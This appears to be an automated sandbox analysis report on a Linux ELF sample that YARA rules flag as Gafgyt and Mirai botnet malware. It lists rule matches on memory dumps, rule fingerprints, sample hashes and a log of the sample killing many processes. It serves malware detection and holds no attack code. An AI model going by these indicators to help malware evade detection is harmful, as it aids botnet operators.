      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6260.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: Process Memory Space: xd.x86_64.elf PID: 6260, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6260, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6262, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6262, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6263, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6263, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6264, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6264, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6265, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6265, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6266, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6266, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6268, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6268, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 936, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 491, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 720, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 721, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 759, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 761, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 772, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 774, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 777, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 785, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 793, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 797, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 1334, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 1335, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 1344, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 1860, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 1872, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 1886, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 2009, result: no such processJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 2048, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 6056, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 6214, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 6215, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 6368, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 6374, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 6408, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)SIGKILL sent: pid: -6263, result: unknownJump to behavior
      Source: LOAD without section mappingsProgram segment: 0x100000
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 936, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 491, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 720, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 721, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 759, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 761, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 772, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 774, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 777, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 785, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 793, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 797, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 1334, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 1335, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 1344, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 1860, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 1872, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 1886, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 2009, result: no such processJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 2048, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 6056, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 6214, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 6215, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 6368, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 6374, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6261)SIGKILL sent: pid: 6408, result: successfulJump to behavior
      Source: /tmp/xd.x86_64.elf (PID: 6263)SIGKILL sent: pid: -6263, result: unknownJump to behavior
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6265.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6268.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
